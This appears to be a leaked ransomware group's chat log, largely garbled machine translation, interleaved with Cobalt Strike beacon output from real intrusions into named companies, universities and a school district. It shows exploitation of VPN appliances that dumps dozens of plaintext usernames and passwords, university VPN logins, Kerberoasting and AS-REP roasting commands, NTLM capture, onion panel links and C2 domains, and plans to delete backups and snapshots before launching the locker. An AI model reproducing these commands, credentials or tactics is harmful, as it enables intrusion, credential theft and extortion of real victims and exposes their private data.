12/23/2020 06:00 PM registry 0 File(s) 0 bytes 4 Dir(s) 55,007,834,112 bytes free The current time is: 13:19:19.88 It's the middle of the day, right? Yeah, let's hope that everything was successful all offeshas still check the area, if available ready) yes it's not clearav included?Z1NPS1 - linux, Z1SDEPLOY - no file is not cheknu other hell is there, but the token worked as razvfail? Z1AD3: 192.168.1.41 - this dkeesh not looked, now domain authorization? 
Z1AGILITYAPP: 10.10.0.17 Z1SDEPLOY: 10.10.0.57 Z1INFOLINK: 192.168.1.224 Z1AD3: 192.168.1.41 Z1CA1: 10.10.0.5 Z1NPS1: 10.10.0.56 ``` This is what's online now, I'll take a closer look at the tops and check if all servers are ok/not ok other servers check domain3, what kind of delays they have left? 57 servers pinged, 67 in total. 41 pulled in, 9 lines, 7 mapped disks. 140 armies pinged - 278 in total managed to ping 40-45ox now or did the end of the day coincide and all the armies went offline) if the servers reboot and the build does not finish the work all will fuck up a little bit armies all put the new mapped servers we probably disabled win-def and av we got burned, changed some people's passwords we started to unhook the armasmas mapped two of them?) it was their own doing) check it out then start 10-15 pcs and started right away? at the last stage of the armas mapped you did not start? we all pulled the server to start laying it out so We've been burned. We're pulling servers, we're mapping armas. How's your progress? [+] received output: 192.168.20.129:445 (platform: 500 version: 10.0 name: CF-RPA05 domain: CEDARFINANCIAL) [+] received output: 192.168.20.110:445 (platform: 500 version: 6.3 name: CF-HQ-RADIUS domain: CEDARFINANCIAL) [+] received output: 192.168.20.109:445 (platform: 500 version: 10.0 name: CF-HQ-DV domain: CEDARFINANCIAL) 192.168.20.113:445 (platform: 500 version: 10.0 name: CF-RPA03 domain: CEDARFINANCIAL) [+] received output: 192.168.20.125:445 (platform: 500 version: 10.0 name: CF-RPA02 domain: CEDARFINANCIAL) Scanner module is complete [*] Checking for MS17-010 vulnerability on ip:192.168.20.129 [+] host called home, sent: 3021 bytes [+] received output: Connecting... [+] received output: Connection Error: connection to port 445 is denied ``and this is my admin BLEEP! 
he has a directive to keep our projects as a priority Nee still very much missedPanel I understand that the current admin went head to head with the teamlid on their projects Where?)it seems that we need to look for a new admina with Tore as I think it's better done with clearing can find on the dns what anomalies bots reserchers or who knows what the fuck tied to direct access through the domain onlythere is a simple logic from my side and do not see advantages in torebo do not like lagisubjective truth I prefer clearing all different say can you consult with your on this issue?I don't know if it makes any difference to us) I'm kind of thinking the same thing, maybe in our case, tor = clear for the feds if you move to clear you need to remove all external data in case of removal of the so vyrobno so nauseating)me in fact torav tor3 different sections with a full page load to make adjustments + availableadmins give the rights to the case there yuzabili not very))) I looked in the ehe all fuckin naponavlena everything where my domains all appeared not only the admin? i see... see... read... cry.... not different but i can only see admin in yours all fuck it, my ass is on fire can i add them to mine if they are not different do i have to prescribe them for all my users? 
which lusthope/periodprescribe you have a parameter only for admin listen nothing flies (put them as soon as you read them also put them in the brute force section through edithttps://ws4nrdkwmjbxrv56pn4knxaex6ttwnjbdrshd6gfq2hw324ugwlgwfad.onion/uessparameter domain and select their polzakov, do not forget to limit the period and lusthonvyvy choose here edit opposite the anchor (dll,ehe) - confighttps://ws4nrdkwmjbxrv56pn4knxaex6ttwnjbdrshd6gfq2hw324ugwlgwfad.onion/тооІѕрегаешь their domains herehttp://ws4nrdkwmjbxrv56pn4knxaex6ttwnjbdrshd6gfq2hw324ugwlgwfad.onion/distinopagesa please tell me how to set my users in the toolpanel so they can generate anchor? try somewhere else to put the blocker in the wayFolder: \Microsoft\Windows\BitLocker TaskName Next Run Time Status ======================================== ====================== =============== BitLocker Encrypt All Drives N/A Ready BitLocker MDM policy Refresh N/A Ready I'm doing a search for HQ # and can't find it.rundll32 C:\Users\Dorinda.alredge\appdata\roaming\Adobe\cache.dll,Control_RunDLLdll is not in place of the stack not run like that? beacon> shell rundll32 C:\Users\Dorinda.alredge\appdata\roaming\Adobe\cache.dll entruPointda where? we have in the common rocket? which ankbekdorpishi in the canal directodomen changed to their vindef not palitaga ok who is responsible for admins? on mine no httpsspass thanks)you're welcome)i can drop dead bots from my zakrpahs which are 93 pcs?aha okekpost update on tulspaneli poured immediately on the check them to their own then https://dyncheck.com/scan/id/1e37fc86492658d48561c7e4f69eb3cdmme the domains have given one check updates) ahaaerezalizayut in tulpanel? tookhttp://dyncheck.com/scan/id/7bd312303566339897552de90bf1c560within tulpanelikor who?vindef palitz all fucked up //dyncheck.com/scan/id/c986a3c2ff98cc338cc1d58c9db9c000cncnc for today then these 2? but he longs to take his from bentley will take his)i think not)levf. 
ytn0 just if i kill you will work differently took these 2 Tell me if I don't kill your domains? I'll take these 2 then on my admin panel I have it written down that these domains are mine. muncuc.com farfaris.com homilistana.com omelezatava.com fikjtyun.com jetbiokleas.com nyhgloksa.com onvegokaue.com ``I understand the second link on the second ank'' muncuc.com,farfaris.com omelezatava.com,fikjtyun.com ``How the fuck should I know?'',omelezatava.com,fikjtyun.com Which ones for the office? These are yours for the main one``` DOMAINS muncuc.com farfaris.com i used to attach these domains to your domains remember? you alive? i think i'll attach them on the fly? i'll debug this shit, i've been working on it for 24 hours, i had problems with launching the dlltams, i figured out that only 3 servers are catching form on the first day on all 3! [+] Location: C:\windows\temp\MRT\* Size Type Last Modified Name ---- ---- ------------------- ---- 205.6KB fil 12/27/2020 17:43:59 vminst.dll fil 01/19/2021 06:30:24 vminst.log `````` Directory of \ovrscweb1\c$\windows\temp\MRT 01/19/2021 03:51 PM 0 vminst.log ``o_o``. Directory of \ovrscweb2\c$\windows\temp\MRT 01/19/2021 03:47 PM 0 vminst.log 1 File(s) 0 bytes 0 Dir(s) 68,013,015,040 bytes free What's up there? What the fuck's up in Overlander? They're just buying access from all sides? fuck it go to # palyoad the fuck up # and work as a cobo. https://mydesktop.kingston.ac.uk/portal/webclient/index.html USER: k1945880@kingston.ac.uk PASS: Thanzeeh77 ``` And also YUK university also think it is worthwhile now to go on the rdpveb? purely to get a license and to get fixed "in the desk" this university it is unlikely that there should be difficult, but pick someone try to go up```. https://vpn.umontreal.ca/dana-na/auth/url_default/welcome.cgi USER: p1204216 PASS: Des99714 so it depends on the outcome of the decision. do you want to take the job? 
I'll mark which are the priority to open what will open) revenus don't give a fuck anyway ok + esfox_com_ad_users.txt I honestly have a hard time collecting you can sign revenus if you have in this format will pass) esfox_com_ad_users.txt tell me how to do) esfox_com_636kk.txt will it be ok in this form? ok I'll do it Yesterday I spent most of the day collecting files from the confiessional since we'll be moving the files I'll just parse them already) Well, to reopen where? also pass the work to globalmarkstatik I'll do it now. i'll give it a priority, just sign the domain in the file name, they need only ad_user? i'll dig through my archives at the same time i have something with ntDSs, i think i'll give you to reopen it tomorrow? i thought maybe i could reopen it today, but it didn't work according to bicon logs?the idea failedda and i don't have the listing, i don't have the log files from the tachkanet they don't give a fuck about the trick, we had a file listing, we just uploaded the assembled file to the mega with the size of the listing but with the locale format to merge the database i can't get back there there people are ready to pay the date i did not download from an important case serious i had a fatal accident((there is a fuckload of stuff to do) why aren't you asleep?i'm not going anywhere. 3 hours, that's no time at all. when you're done with your chores, we'll probably run through some more. yeah. patch on a particular holea, I still have to prepare files to reopenadvizori? yes not patched so straight away was not advizori ... already released a patch that lisoniki chet sploit glitchy it fixes soniki wait? that's it like that ... 
I'll do the brut from globaltranzav five kovyty her) grid on lardbilimora you have anything to work with today?i can't remember anything else))) mmmmm deadline for tomorrow it's already been ordered by the augabrooks and kermit guys there's cobalt testing to be deployed ehhh i got lost can you remind me of my tasks now it'll be weird we wrote yesterday so i'm taking tomorrow deadline listen to this there's gonna be a download soon, right? fuckin' great i'm just sleepy. how's it going?) hi there, tomorrow by 12:00+retif.com, plzbukkammer no one's got any webmorda2auth+pozhaylustamen add to it so far only adinfu has time to throw out of there fast. that's where yes`grantweber.com I checked everyone in the first one, no one has any bookmarks. in the second without 2fa, go through the client, almost immediately throws out, butch more men seem to move? [+] Checking URL https://172.81.67.174 [+] Found old SMA version (<9.x) [+] Appliance running version 9.0.0.2-13sv [+] Leaking sessions to dump configuration. 
[+] Attempting to dump sessions from https://172.81.67.174 [+] Found: SessionID: 0nwEo7juJp9uceT0bhNC2hMM7VuvDFIjyC5LyKjx6fQ= userType: 1 userName: dscully Password: Scully2@ Domain: retif [+] Found: SessionID: 3mzEGy480eoTW0PVGB4WkTx1pBcNckgNRvimSDRWboM= userType: 1 userName: acatalanotto Password: vera1010 Domain: retif [+] Found: SessionID: 6nkViGzUAfwhcy9EQTC4B1cnAJKVmuLVBoJQnaDHKKI= userType: 1 userName: rblanchard Password: abcd@1234 Domain: retif [+] Found: SessionID: 7180aU0jSdpraYLUADh6OpRYJJZekIHXoo2xT8XjI1tM= userType: 1 userName: anguyen Password: Car47029 Domain: retif [+] Found: SessionID: ClOqhz81D1QDthdUyzSnIFF3f9qpwBDnv6lJAueAMI= userType: 1 userName: dstoutin Password: C@ryH@milton Domain: retif [+] Found: SessionID: IMGyFJ3dmPSncBddBfqJzy5C9W0heL1wY02V35a3Ei8= userType: 1 userName: dblanchard Password: Tujaques2 Domain: retif [+] Found: SessionID: NrRgAAQeaCc1nMajX8HGk4ySOyKy89nDEs5Dbfm7JAtA= userType: 1 userName: mcooper Password: !Crystal2 Domain: retif [+] Found: SessionID: W1ed6V04FqvC8gm29587VfRoeqi7xvSIltpz1O6txrw= userType: 1 userName: lotrocki Password: Lisa0759 Domain: retif [+] Found: SessionID: WMhTxZjMPY1fIXps0WPYYA2kgbnnKD1fQxQm5tbuEoI= userType: 1 userName: jdufrene Password: Memphis3 Domain: retif [+] Found: SessionID: ZuQ9mTRTfwnBvo01zvkWjbiEpg08U9ZZtdH7rXiISAg= userType: 1 userName: hnguyen Password: Jan_2021 Domain: retif [+] Found: SessionID: dN616QT3BLlfjo6XWoSaQVHJnAngQo6LiTVFH30xc4w= userType: 1 userName: Pschmidt Password: AKLfefe1988!!! Domain: retif [+] Found: SessionID: e6cwRd0MGWQZVZHmX09ldTrZdr4VC23Cm4qU1V41dZ0w= userType: 1 userName: lgagnet Password: Minto123* Domain: retif [+] Found: SessionID: eI0R46CQYycD1NLEwpoEdF9nHtx7vpteNugSjYFj9tg= userType: 1 userName: awashington Password: 0ilTruck! 
Domain: retif [+] Found: SessionID: jgdazqQh0tgr1o8MG6ikF2184YZzRokNrHb1PTyin5c= userType: 1 userName: msepter Password: abcd@1234$ Domain: retif [+] Found: SessionID: jwAGVr88UefTCwRfR9L4c8yeyRQAEFQlVtois0VO7X0= userType: 1 userName: lfisher Password: Alexander14 Domain: retif [+] Found: SessionID: jyQ0Ho1OBKlJSAVMstBiz1MvRXBKywGB0XYEiwMfcg= userType: 1 userName: jrusso Password: 504Jamie#@! Domain: retif [+] Found: SessionID: oNbdkn6iFhSvXfc3yvNApWNCg71kcTk1Lky2pn04jY= userType: 1 userName: kjones Password: Dothan24! Domain: retif [+] Found: SessionID: s27ilDCfc00iQPuHM0LueLSKoC8i4a4eT4A1D5LbNPQ= userType: 1 userName: lcoriell Password: Jutland@1840 Domain: retif [+] Found: SessionID: uapufXbKjgRslg2pFYEmT8b5PkKO9s4N5stplyxkEfQ= userType: 1 userName: tragas Password: Troll112// Domain: retif [+] Found: SessionID: x7QnRi1w6uhqEK3E3z7XUPKtgDcbYWWaFCPNbG0idLI= userType: 1 userName: ehicks Password: H@ppyD@y1 Domain: retif [+] Found: SessionID: xtxwXEVx0Rp5h8Lc40tMB5kMB5kBQTvFpLfdXxYP3UPOH6o= userType: 1 userName: barcement Password: Ba041913* Domain: retif [+] Found: SessionID: y43yuwBMnVBmeEEjwC6k8yRxce0p619bb2U6IU8rg8= userType: 1 userName: dwinter Password: Blair127! Domain: retif [+] Found: SessionID: zxKhq2SRlYmt17y2UOP1BXEwyh00UCkDAgUKb2HL2PU= userType: 1 userName: ehassell Password: Amelia#0130 Domain: retif [+] Done with https://172.81.67.174, found 23 sessions 23 [+] Saving session data [+] Trying session 0nwEo7juJp9uceT0bhNC2hMM7VuvDFIjyC5LyKjx6fQ= [+] Saving config to ./Dumps/172.81.67.174/config.sqlite [==================================================] [+] Config dumped [+] Parsing configuration data [+] Finding users [+] Found 78 users [+] Finding AD credentials [!!!] Found Active Directory creds [+] AD creds Administrator:Manresa02#@10.1.10.210 [+] Looking for LDAP domain credentials [-] No LDAP credentials found. 
[+] Looking for RADIUS domain creds [-] No usable RADIUS domain data [+] Parsing bookmarks [+] Found bookmarks, Hunting for creds [+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user {'userGroupID': 4, 'name': 'Retif Terminal Server', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': 'rtfterm.retifnet.retif.com'} [+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user {'userGroupID': 4, 'name': 'PDI Terminal Server', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': 'rtfpditermprd.retifnet.retif.com'} [+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user {'userGroupID': 6, 'name': 'MAS90 Terminal for ehicks', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': 'jut-ehmaas.retifnet.retif.com'} [+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user {'userGroupID': 41, 'name': 'Desktop', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': 'JUT-JHARTLEY2.retifnet.retif.com'} [+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user {'userGroupID': 39, 'name': 'L Fisher Desktop', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': 'JUT-LFISHER.retifnet.retif.com'} [+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user {'userGroupID': 67, 'name': 'Office Desktop', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.1.10.72'} [+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user {'userGroupID': 71, 'name': 'PDI Terminal Server', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': 'rtfpditermprd.retifnet.retif.com'} [+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user {'userGroupID': 71, 'name': 'Retif Terminal Server', 'username': '', 
'password': '', 'service': 'UNK_SERVICE', 'host': 'rtfterm.retifnet.retif.com'} ``and there's also one more crack in the works right now''. [+] Checking URL https://173.247.171.106 [+] Found latest version (9.x+) of SMA appliance [+] Appliance running version 10.2.0.1-18sv [+] Leaking sessions to dump configuration. [+] Found: SessionID: 08wKU0nD0NHM018GdPixkSp0veaEEfUNs1sfY3emGN8= userType: 1 userName: connie.arteaga Password: Clevs8787 Domain: Beyond [+] Found: SessionID: 1EYTlhUHb3WlJkyj6scGx0d1E45q4HdXA1KqyU8IXYs= userType: 1 userName: jim.movius Password: Grant3333 Domain: Beyond [+] Found: SessionID: 1Yw1sPSEQbDO1nbNbjTBcBcHdiJImQaNz1I1lwAmnxOSSE= userType: 1 userName: Steven.Craig Password: Grant2020 Domain: Beyond [+] Found: SessionID: 1nOvfdxEtWVea0UkJvtNyIwBLP0O79CE8E1GZZdONc= userType: 1 userName: steve.price Password: Incorrect100 Domain: Beyond [+] Found: SessionID: 3HZDekmljv4atHltwUxKNQY1S0v1jlgw1TtNSAZG7pw= userType: 1 userName: Leslie.Avalos Password: Grantweber2018 Domain: Beyond [+] Found: SessionID: 98xPB0MpOWeItn9GWgS93plCOLbFch0X9xFcN8shiag= userType: 1 userName: kailani.gaspar Password: v1nce2307 Domain: Beyond [+] Found: SessionID: Cf3UjAwYoQgvqTHWxkBX3gdrOM6syrTuecLKh05qUoc= userType: 1 userName: robert.nye Password: Grant2020 Domain: Beyond [+] Found: SessionID: EYZKipX33P9zsCZ6se1WIx01zUkyMFdBRQcmLlADkhw= userType: 1 userName: pilar.zuniga Password: basiaZ1929 Domain: Beyond [+] Found: SessionID: HDREC6P5KFHGoW1vGbZLyTQxGc5aUNHzuaMgVHE2KOk= userType: 1 userName: Rodolfo.Maldonado Password: Grant2021* Domain: Beyond [+] Found: SessionID: Ikd51149NxTHZFsSlmFzmcgqGvEAR4jfGWqL9nEJQhg= userType: 1 userName: joanna.gallegos Password: Grant2020 Domain: Beyond [+] Found: SessionID: J1cTnjaQPil0T86G0S6JkLE0a3AA41xSB3oJ2C1nDPg= userType: 1 userName: tony.aguayo Password: Grant2020 Domain: Beyond [+] Found: SessionID: KMDs2M9R8fDa79OTo8S348NFJvJvBp0QiRPbTsMK14Gmc= userType: 1 userName: Denise.Williams Password: Grant2016 Domain: Impact [+] Found: 
till 12 plus minus? all 3 in the shit? they're already pretty used by TV - but okay)) yeah, right))) there are three more from Friday. like you at 0? do you have coba? take it?
``@tl1 today until what time?`` @user4 says pngcpower failed pngcpower. nothing to work with. so you have nothing to work with? or is tv poking around? new sessions will be @tl1iandreevsnikitenkostalinottl2tl1admin
```
====== NetworkShares ======
Name : ADMIN$ Path : C:\windows Description : Remote Admin
Name : C$ Path : C:\ Description : Default share
Name : IPC$ Path : Description : Remote IPC
```
We set up a timeserver, we will try to pierce through it and mark from your packs what got attracted. that not on 100 in 2 and 3? 77 yes, we split already there, draw the remaining 77 @user7 in my opinion we dumped 3 kobut to servers, more maybe randl leave in the attracted immediately into the system to jump or yet do not care? dunno, why did we make them? so why piip if the normal one opens? piip opened with a dll that you were given? opened? *** initial beacon from tylerservice *@10.0.61.53 (SHAREP-WEB1) ``I wrote above :confused:`` +catchy comment? I'm here ``what the fuck is this? first 100 fly to 185...113, to 100 servers; second 100 to 199....166 without, where not attracted then C`10.0.61.53`` with pip? give the server for example which is not attracted, it is 300 scoreenu +-, so it is not 200. yes. there was only one needed then. the rest just did not close. 277 servers? why not winlogon?) dunno, so it happened) in kobe where? rundll32? a question, why so many rund processes? and also let's draw what is drawn. admin.sisd.k12 and here we have a basis of 200 servers? no, with 15 is sisd.k12, they are at user7. so this domain with 15 pc? I have all sessions only on admin.sisd.k12, it does not on another domain. sessions set domain )))) is it? 976 what is the session in the main domain? the other 2 where it is allowed to go then change the kobe. Then all the kobe is not available? I have only succeeded in my login. is there any new kobe? not one to connect, no net pings to the ip koba?
we have some shit with the network. has not helped. try to reboot the pc just in case, most likely it's the connection. I work with sessions, last does not change. I now in neikoba itself hangs, still not let? can not rejoin, and the guys can not go either. qwqe rejoin. my koba hangs. give me a list of cleared admins. kreidenschmuck @user4 vmic also does not work? i'll take it into account. 1 nickname on all kobas also do not roll without repetition. transcripts and stuff. nicky russian characters. what else does not roll? transcript also do not roll. He is your idol? why? 3796 and lukashenko also do not roll. aKiric? do i really need to explain? 12/08 17:50:20 *** Lukashenko has joined. What beacon is it? @tl1 are you talking about? What beacon? ``moyanet``. ``is it deleted?`` ``check it out.`` ``x64 hopefully?`` ``my coba`` ``Figured it out.`` windows executable(s) and how did you get it if you can not see? in payload generator do not see this listener. and throw here access to the two cobbs in which we will work. some shellcode on this bindpipe, and here bindpipe, see? now check the current dll. dll start and delete it. or it's averts tear - I don't know. but the session does not come, traffic, even something? about the not attracted, found out why?
since you have not found the admin, will have to) and you asked why attract them)) I told you, very few people are attracted... when you pull all 200 servers, according to the classics migrate to the system process, give access to the other colleagues in these kobytoy, in 2 kobytoy spread 100 each on kobuna, all 200 servers throw sessions in the kobyu. we have 200 servers and 4000 Armory. do the following, since we have not found the admin YDR everything will have to do by hand. Build will be 3 files: exe, dllx64, dllx86. okay then move on +++++ yes, like done. done, not finished yet? on the spot now. reboot the machine hangs + wait until everything is done, nothing will explode) menu will pop up until you submit its contents, it is there) press, nothing will explode? dllinject item not visible in the menu. the more you leave time for a briefing the more counter questions will be answered and then you yourself will do everything. will explain strategy to close, not delayed. ok + I do not need to clean up and download 2? 3/5 fdsitgjeiey yes, only I did not skidkode, now @all write down who is here? ah, then all of you now install in the coba and all the use kizakimog do it in the general? you have done - write down what you have done - I give you the task as above, work in this format, put in the coba new cna files. user3user94273 how many user pc's do we have?
it's on dk in admin.sisd.k12 11:20 AM. Snap the time here on the server and send it here. + it's the contents of the file, actually:
```
TicketByteHexStream :
Hash : $krb5tgs$23$*certsrv$csez.zohocorpin.com$http/its-winca.csez.zohocorpin.com
SamAccountName : certsrv
DistinguishedName : CN=certsrv,CN=Users,DC=csez,DC=zohocorpin,DC=com
ServicePrincipalName : http/its-winca.csez.zohocorpin.com
```
`Invoke-Kerberoast -OutputFormat HashCat | fl | Out-File -FilePath c:\ProgramData\hashes.txt -append -force -encoding UTF8` translate into a file with hash format. actually it seems to be the one that you have already given us in the slide.com/EmpireProject/Empire/blob/mob/master/data/module_source/credentials/Invoke-Kerberoast.ps1 give me a link to the invoke kerb with which you shoot the OS.
```
[+] received output:
2020-09-24T00:20:44 - HTTP request for / received from 10.59.0.243
2020-09-24T00:20:44 - HTTP NTLMv2 challenge/response captured from 10.59.0.243 (RAJA-9298):
raja
```
```
beacon> execute-assembly /home/user/Desktop/cobalt/Signature_Tools/Ghostpack-CompiledBinaries-master/Rubeus.exe asreproast /domain:ru.zohocorpin.com
[*] Tasked beacon to run .NET program: Rubeus.exe asreproast /domain:ru.zohocorpin.com
[+] host called home, sent: 318067 bytes
[+] received output:
(Rubeus banner) v1.5.0
[*] Action: AS-REP roasting
[*] Target Domain : ru.zohocorpin.com
[*] Searching path 'LDAP://win2k12master.csez.zohocorpin.com/DC=en,DC=zohocorpin,DC=com' for AS-REP roastable users
[+] received output:
[X] Error executing the domain searcher: A referral was returned from the server.
```
```
beacon> execute-assembly /home/user/Desktop/cobalt/Signature_Tools/Ghostpack-CompiledBinaries-master/Rubeus.exe asreproast /domain:tsi.zohocorpin.com
[*] Tasked beacon to run .NET program: Rubeus.exe asreproast /domain:tsi.zohocorpin.com
[+] host called home, sent: 318069 bytes
[+] received output:
(Rubeus banner) v1.5.0
[*] Action: AS-REP roasting
[*] Target Domain : tsi.zohocorpin.com
[*] Searching path 'LDAP://win2k12master.csez.zohocorpin.com/DC=tsi,DC=zohocorpin,DC=com' for AS-REP roastable users
[+] received output:
[X] No users found to AS-REP roast!
```
```
beacon> execute-assembly Rubeus.exe kerberoast /domain:ru.zohocorpin.com
[*] Tasked beacon to run .NET program: Rubeus.exe kerberoast /domain:ru.zohocorpin.com
[+] host called home, sent: 320115 bytes
```
it's been like this for about 5 minutes, nothing. I think I'll try again with rubeus?
```
beacon> psinject 24992 x86 invoke-kerberoast -domain ru.zohocorpin.com | fl
[*] Tasked beacon to psinject: invoke-kerberoast -domain ru.zohocorpin.com | fl into 24992 (x86)
[+] host called home, sent: 125019 bytes
[+] received output:
ERROR: Exception calling "FindAll" with "0" argument(s): "A referral was returned from the server.
ERROR: "
ERROR: At line:990 char:20
ERROR: + else { $Results = $UserSearcher.FindAll() }
ERROR: +                   ~~~~~~~~~~~~~~~~~~~~~~~~~~
ERROR:     + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
ERROR:     + FullyQualifiedErrorId : DirectoryServicesCOMException
ERROR:
```
Really? I saw it the first time, too. Where's the invoke kerb on trusts?
```
dn:CN=tsi.zohocorpin.com,CN=System,DC=csez,DC=zohocorpin,DC=com
>whenCreated: 2011/11/12-21:30:09 UNKNOWN TZ
>name: tsi.zohocorpin.com
>securityIdentifier: S-1-5-21-485680246-861548126-816136305
>trustDirection: 3 [Inbound(1);Outbound(2)]
>trustPartner: tsi.zohocorpin.com
>trustType: 2 [UpLevel(2)]
>trustAttributes: 8 [Transitive(8)]

dn:CN=en.zohocorpin.com,CN=System,DC=csez,DC=zohocorpin,DC=com
>whenCreated: 2017/12/31-13:18:45 UNKNOWN TZ
>name: ru.zohocorpin.com
>securityIdentifier: S-1-5-21-923540578-3079758315-1995498360
>trustDirection: 3 [Inbound(1);Outbound(2)]
>trustPartner: ru.zohocorpin.com
>trustType: 2 [UpLevel(2)]
>trustAttributes: 8 [Transitive(8)]
```
Where are the trusts? OK, missed it apparently, never mind, but for future reference again - psinject is better than powerpick :woozy_face:
```
beacon> powerpick invoke-kerberoast | fl
[*] Tasked beacon to run: invoke-kerberoast | fl (unmanaged)
[+] host called home, sent: 133715 bytes
[-] could not spawn C:\WINDOWS\sysnative\mstsc.exe: 5
[-] Could not connect to pipe: 2
beacon> psinject 24992 x86 invoke-kerberoast | fl
[*] Tasked beacon to psinject: invoke-kerberoast | fl into 24992 (x86)
[+] host called home, sent: 125019 bytes
[+] received output:
TicketByteHexStream :
Hash : $krb5tgs$http/its-winca.csez.zohocorpin.com
SamAccountName : certsrv
DistinguishedName : CN=certsrv,CN=Users,DC=csez,DC=zohocorpin,DC=com
ServicePrincipalName : http/its-winca.csez.zohocorpin.com
[*] Hashes have been saved at: /tmp/hashes-kerberoasting.txt
```
Why do you keep using powerpick instead of psinject? I'm writing INVOKE-KERBEROAST, what does this have to do with Inveigh?
```
beacon> powerpick Invoke-InveighRelay -ConsoleOutput Y -StatusOutput N -Target 172.20.3.7 -Command "tasklist" -Attack Enumerate,Execute,Session
[*] Tasked beacon to run: Invoke-InveighRelay -ConsoleOutput Y -StatusOutput N -Target 172.20.3.7 -Command "tasklist" -Attack Enumerate,Execute,Session (unmanaged)
[+] host called home, sent: 133715 bytes
[-] Could not connect to pipe: 2
```
That's right, so on any error - command and output immediately in the message to the conf. Possibly I start wrong: immediately command -invoke does not work, and can work with Rubeus) Rubeus better. the invoke kerberoast on trusts does not work as i remember. try to set invoke kerberoast on trusts. Do you have any trusts? have done ad_find, seatBelt, ChromeSharp, winpeas, rubeus, Inveigh, tried every possible exploit. user9 user7 user2 user1 vind 2008
https://adsecurity.org/?p=1255 No. YES. not yet? `OU=Domain Controllers`
Good night, until tomorrow at 2. session in sliptoe, then we'll leave it for tomorrow. nea, dk also no available news? the rest tomorrow, and if past then we all wait 20 min. endomen did not rise? yeah, i also have all fallen out of my sliptoe, although it pings by name... no, he needs to change the ns record, so the computers will see the new dk. if the dns live. authentication failed?
he probably raised the external, so that at least something in the network to work and you can understand what's happening. and external and dk looks like an external ips. `https://192.168.0.254/`
```
Pinging wwdc1.waterway.com [104.130.139.13] with 32 bytes of data:
Reply from 104.130.139.13: bytes=32 time=19ms TTL=50
Reply from 104.130.139.13: bytes=32 time=19ms TTL=50
Reply from 104.130.139.13: bytes=32 time=19ms TTL=50
Reply from 104.130.139.13: bytes=32 time=19ms TTL=50

Ping statistics for 104.130.139.13:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 19ms, Maximum = 19ms, Average = 19ms
```
```
Pinging wwdc2.waterway.com [104.130.139.13] with 32 bytes of data:
Reply from 104.130.139.13: bytes=32 time=19ms TTL=50
Reply from 104.130.139.13: bytes=32 time=19ms TTL=50
Reply from 104.130.139.13: bytes=32 time=19ms TTL=50
Reply from 104.130.139.13: bytes=32 time=19ms TTL=50

Ping statistics for 104.130.139.13:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 19ms, Maximum = 19ms, Average = 19ms
```
```
9512 beacon> shell net accounts /dom
[*] Tasked beacon to run: net accounts /dom
[+] host called home, sent: 48 bytes
[+] received output:
The request will be processed at a domain controller for domain waterway.com.

System error 1355 has occurred.

The specified domain either does not exist or could not be contacted.
```
No authorization is up yet. The whole company is fucked. What's the situation? No authorization is up yet? Is it up yet? and you only wiped nimble? OK, then this way. I thought it was easier to exchange info like this off-line. You're not alone here. Why should I send everything to you?
20 min period. just monitor on the topic of network disconnection. domain authorization mb will fix))) and watch on the topic? or something else? bitch) youtubchik watch. how is their situation? not sure yet. found in their downloads one more pst, accountant, 223 megabytes. @tl1 i will encrypt the admin cars, they have backups there, can locally take the files. it seems their network a lot we there nabakapili? 1 the fuck for all the caches support processing. gbpltw but will be experienced of course turned out... + nimble to 0? "We can't sign you in with this credential because your domain isn't available. Make sure your device is connected to your organization's network and try again. If you previously signed in on this device with another credential, you can sign in with that credential." I'm looking, but there's no such thing as a counterpart of the kazina. You can't restore it by yourself, can you?
```
beacon> shell net group "domain admins" /dom
[*] Tasked beacon to run: net group "domain admins" /dom
[+] host called home, sent: 61 bytes
[+] received output:
The request will be processed at a domain controller for domain waterway.com.

System error 1355 has occurred.

The specified domain either does not exist or could not be contacted.
```
is the domain down?
is the shara working in parallel? only with the token will get in trouble. now we'll pull what's pulling and let the build go. now let it all go. most likely not all unshared, because with dk launched build? orbs and build, one build by one button. so on the list of arms let, but do not start. tell me how to run the build. will be snapped by three there. start, the more the better, let a few pieces of arms. only arms remained... if they killed all the servers and will decide from there what to expect, they will now go to the nimbles. to wait for the nimbles, then let the arms? + all the virtuals have died? in a hurry once started, delete the snaps in any case. ahahaha anywhere the fuck, it looks like the nimbles not snapshot. we crash the servers along with the volume on the nimbles have crashed?
```
beacon> shell ping -n 1 192.168.0.192
[*] Tasked beacon to run: ping -n 1 192.168.0.192
[+] host called home, sent: 54 bytes
[+] received output:
Pinging 192.168.0.192 with 32 bytes of data:
Reply from 192.168.0.122: Destination host unreachable.

Ping statistics for 192.168.0.192:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
```
the spare koba. but i can't find it, i can't read it properly, i should have turned it off, but @user4 wrote it, no way did you delete it? this is what's bothering me, as long as it's connected, it won't let me delete it. did you delete it? ahahahahaha ran pre.bat all over ad. pogonali, guys, also three other external backs were? pogonali pognaidak what the fuck, and there and arms will be unshared. all i let delete snaps. how long will be sharya? on 1 ping request could not find the site. well fuck with nimin 4 annichabel from most hosts + and psek past?
on 4 no 445. was 1619 servers, was not it? dak their 7 tamas you are operational) and then at the moment erase snaps and start up. arms are unshared. servers are there too. you do network, but at the moment when the servers will be pulled under 0. i think so too, yes, it is written that snapshots of their virtuals in another place? and inside? nice to find) check the contents of the live ones, just a cluster is not virtuals? all the backups will delete everything? and a maximum of 10 minutes here, time is not on the clock to lock or unlock the pc + run pre.bat, run the locker. internal, delete externals, all in one moment, all in one place. aha ok, the second. Parsons smoking is the second?
```
